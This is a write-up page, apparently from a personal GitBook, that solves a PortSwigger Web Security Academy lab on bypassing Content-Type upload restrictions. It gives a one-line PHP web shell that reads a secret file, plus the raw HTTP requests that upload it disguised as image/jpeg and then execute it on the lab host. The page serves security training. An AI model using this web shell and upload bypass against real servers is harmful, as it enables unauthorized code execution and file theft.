Write-Ups
Write-Ups
Write-Ups
  • 📙Write-Ups
  • 🔋Hack The Box
    • 🕹ī¸Challenges
      • 🎰AI - ML
        • ☄ī¸AI SPACE
      • ⛓ī¸Blockchain
        • 🤸Survival of the Fittest
      • 🔮Crypto
        • đŸ‘ļBaby Time Capsule
        • đŸ•ēThe Last Dance
      • âĒReversing
        • BabyEncryption
        • 🌒Behind the Scenes
        • đŸŖBabyEncryption
        • 💹Simple Encryptor
      • 🎛ī¸Hardware
        • 💉The Needle
        • 🔏Photon Lockdown
      • đŸĨ¸OSINT
        • 💸Money Flowz
      • 🕸ī¸Web
        • 🏴‍☠ī¸Flag Command
        • 💓LoveTok
        • 🗒ī¸PDFy
        • jscalc
        • 🙈ProxyAsAService
        • ApacheBlaze
        • ❓RenderQuests
        • đŸ’ĨNeonify
        • 😑No Treshold
        • 🎑Breathtaking View
    • 🏰Fortress
      • đŸĻ™AWS
    • đŸ’ģMachines
      • 🎒Backfire
      • đŸ’ĨBigBang
      • 🐈‍âŦ›Cat
      • ✔ī¸Checker
      • đŸļDog
      • 🧧Environment
      • 👮EscapeTwo
      • ⚜ī¸Eureka
      • đŸĻNocturnal
      • 🔞UnderPass
      • đŸšĸTitanic
      • TheFrizz
      • 🐰WhiteRabbit
    • 🧐Sherlocks
      • Meerkat
      • Bumblebee
    • đŸĨŧProLabs
      • 🃏FullHouse
    • 💀Season 8
    • đŸĻ“Scripts/Functions/Tools
  • 💔PortSwigger
    • đŸ›Ŗī¸Learning Path
      • â™ŋApi testing
        • Lab: Exploiting an API endpoint using documentation
        • Lab: Finding and exploiting an unused API endpoint
        • Lab: Exploiting a mass assignment vulnerability
        • Lab: Exploiting server-side parameter pollution in a query string
      • 🔐Authentication vulnerabilities
        • Lab: Username enumeration via different responses
        • Lab: Username enumeration via subtly different responses
        • Lab: Username enumeration via response timing
        • Lab: Broken brute-force protection, IP block
        • Lab: Username enumeration via account lock
        • Lab: 2FA simple bypass
        • Lab: 2FA broken logic
        • Lab: Brute-forcing a stay-logged-in cookie
        • Lab: Offline password cracking
        • Lab: Password reset broken logic
        • Lab: Password reset poisoning via middleware
        • Lab: Password brute-force via password change
      • 📁File upload vulnerabilities
        • Lab: Remote code execution via web shell upload
        • Lab: Web shell upload via Content-Type restriction bypass
        • Lab: Web shell upload via path traversal
      • 📉GraphQL API vulnerabilities
        • Lab: Accessing private GraphQL posts
        • Lab: Accidental exposure of private GraphQL fields
        • Lab: Finding a hidden GraphQL endpoint
        • Lab: Bypassing GraphQL brute force protections
        • Lab: Performing CSRF exploits over GraphQL
      • đŸ–Ĩī¸Server-side vulnerabilities
        • 🛤ī¸Path traversal
          • Lab: File path traversal, simple case
        • 🛂Access control
          • Lab: Unprotected admin functionality
          • Lab: Unprotected admin functionality with unpredictable URL
          • Lab: User role controlled by request parameter
          • Lab: User ID controlled by request parameter, with unpredictable user IDs
          • Lab: User ID controlled by request parameter with password disclosure
        • 🔐Authentication
          • Lab: Username enumeration via different responses
        • đŸ–Ĩī¸Server-side request forgery(SSRF)
          • SSRF attacks against the server
          • Lab: Basic SSRF against the local server
          • Lab: Basic SSRF against another back-end system
        • 🆙File upload vulnerabilities
          • Lab: Remote code execution via web shell upload
          • Lab: Web shell upload via Content-Type restriction bypass
        • 👊OS command injection
          • Lab: OS command injection, simple case
        • 💉SQL injection (SQLi)
          • Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
          • Lab: SQL injection vulnerability allowing login bypass
      • đŸ§ĻWebSockets
        • Lab: Manipulating WebSocket messages to exploit vulnerabilities
        • Lab: Manipulating the WebSocket handshake to exploit vulnerabilities
        • Lab: Cross-site WebSocket hijacking
Powered by GitBook
On this page
  1. PortSwigger
  2. Learning Path
  3. Server-side vulnerabilities
  4. File upload vulnerabilities

Lab: Web shell upload via Content-Type restriction bypass

https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-content-type-restriction-bypass

file.php
<?php echo file_get_contents('/home/carlos/secret'); ?>

Change Content-Type to image/jpeg or image/png 

POST /my-account/avatar HTTP/2
Host: 0aca000b031532b7802e80bf00c500dc.web-security-academy.net
Cookie: session=PnpA8279S7VQTSlKmm2XiBRT4Igd1cXq
Content-Length: 459
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: de-DE,de;q=0.9
Origin: https://0aca000b031532b7802e80bf00c500dc.web-security-academy.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXfRtnWHTAEN8aaaH
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aca000b031532b7802e80bf00c500dc.web-security-academy.net/my-account
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

------WebKitFormBoundaryXfRtnWHTAEN8aaaH
Content-Disposition: form-data; name="avatar"; filename="file.php"
Content-Type: image/jpeg

<?php echo file_get_contents('/home/carlos/secret'); ?>
------WebKitFormBoundaryXfRtnWHTAEN8aaaH
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundaryXfRtnWHTAEN8aaaH
Content-Disposition: form-data; name="csrf"

fSosFlejyy8YxJFE7YNiLjOab80jmG6S
------WebKitFormBoundaryXfRtnWHTAEN8aaaH--

GET /files/avatars/file.php HTTP/2
Host: 0aca000b031532b7802e80bf00c500dc.web-security-academy.net
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Upgrade: websocket
Origin: https://0aca000b031532b7802e80bf00c500dc.web-security-academy.net
Sec-Websocket-Version: 13
Accept-Encoding: gzip, deflate, br
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: session=PnpA8279S7VQTSlKmm2XiBRT4Igd1cXq
Sec-Websocket-Key: S2GZ5cyYQBZQXqdEnVknBw==

Last updated 5 months ago

💔
đŸ›Ŗī¸
đŸ–Ĩī¸
🆙